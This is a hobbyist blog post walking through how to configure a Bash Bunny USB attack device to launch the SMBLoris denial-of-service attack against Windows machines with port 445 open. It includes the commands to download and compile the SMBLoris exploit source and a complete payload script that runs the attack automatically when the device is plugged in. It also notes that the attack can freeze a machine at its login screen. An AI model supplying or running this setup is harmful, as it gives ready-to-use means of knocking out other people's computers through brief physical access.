I was watching Mr. Robot series recently and this idea came around to configure Bashbunny to automate the SMBLorris attack against Windows system. The whole concept is really simple and I will explain in the next steps what needs to be done.
You can check the initial article regarding Bashbunny and Metasploit here https://astr0baby.wordpress.com/2017/05/23/bashbunny-with-metasploit-ms17_010_eternalblue-vs-windows-7-sp1-x64/
So lets first prepare the Bashbunny device (make sure you can ssh to the device and set Internet connection sharing – setup is covered here) (( I have done all the setup on a Linux system))
# date -s "20170523" Add this to /etc/apt/sources.list deb http://http.us.debian.org/debian/ jessie-updates main # apt-get update # apt-get -y install autoconf build-essential
Now lets fetch the SMBLoris sources from https://gist.github.com/marcan and build the code on BashBunny
# mkdir /root/smb # cd /root/smb # wget https://gist.githubusercontent.com/marcan/6a2d14b0e3eaa5de1795a763fb58641e/raw/565befecf4d9a4a27248d027a90b6e3e5994b5b6/smbloris.c # gcc smbloris.c -o smbloris
We are almost done, next we need to prepare the payload.txt on the Basbunny (Switch 1 or Switch 2) to load the smbloris binary
#!/bin/bash LED SETUP # Enable Ethernet (RNDIS = Windows, ECM = mac/*nix) #ATTACKMODE RNDIS_ETHERNET #ATTACKMODE ECM_ETHERNET ATTACKMODE RNDIS_ETHERNET #Set some current time ..... check your watch date -s "20170823" LED ATTACK /root/smb/smbloris usb0 22.214.171.124 255.255.255.254 172.16.64.64 LED FINISH
Now arm your Bashbunny and set the switch to position where you have saved the paload.exe
We know the target IP will allways be 172.16.64.64 so this makes all too simple. All that is needed for this attach obviously is an open TCP port 445 on the Windows machine. I have switched off the firewall for the test’s sake. Below is a short video of the automated attack.
The machine under attack will come back to life after some time. The laptop I was testing this against is a Thinkpad x100e with 2 GB RAM and it came back to life after about 3-10 minutes (I have unplugged the bash bunny immediately when the system froze) but the timing could be different depending on the stuff that is running on the machine. Also please bear in mind that via this attack you can fill in max 8 GB of RAM. Machines with more than that will be OK. However I have observed that if you leave the BashBunny in for a longer time (10 minutes) the system recovery takes way much longer ..
Obviously the same approach can be used against Linux/OSX with Samba running.
P.S. I have tried the metasploit module auxiliary/dos/smb/smb_loris.rb but it is not as powerful as Hector’s C code and does not freeze the host. (Possibly it is due to the limitation of the Bashbunny’s 512 RAM and the ruby requirements to load metasploit)
P.P.S What is interesting though, is that if you plug in the armed Bashbunny to the target machine that is switched off, once booted the attack will start; thus rendering the login almost impossible. The login screen will just appear frozen; until you disconnect the device. Even more interesting is the fact that after unplugging the device the machine stays frozen …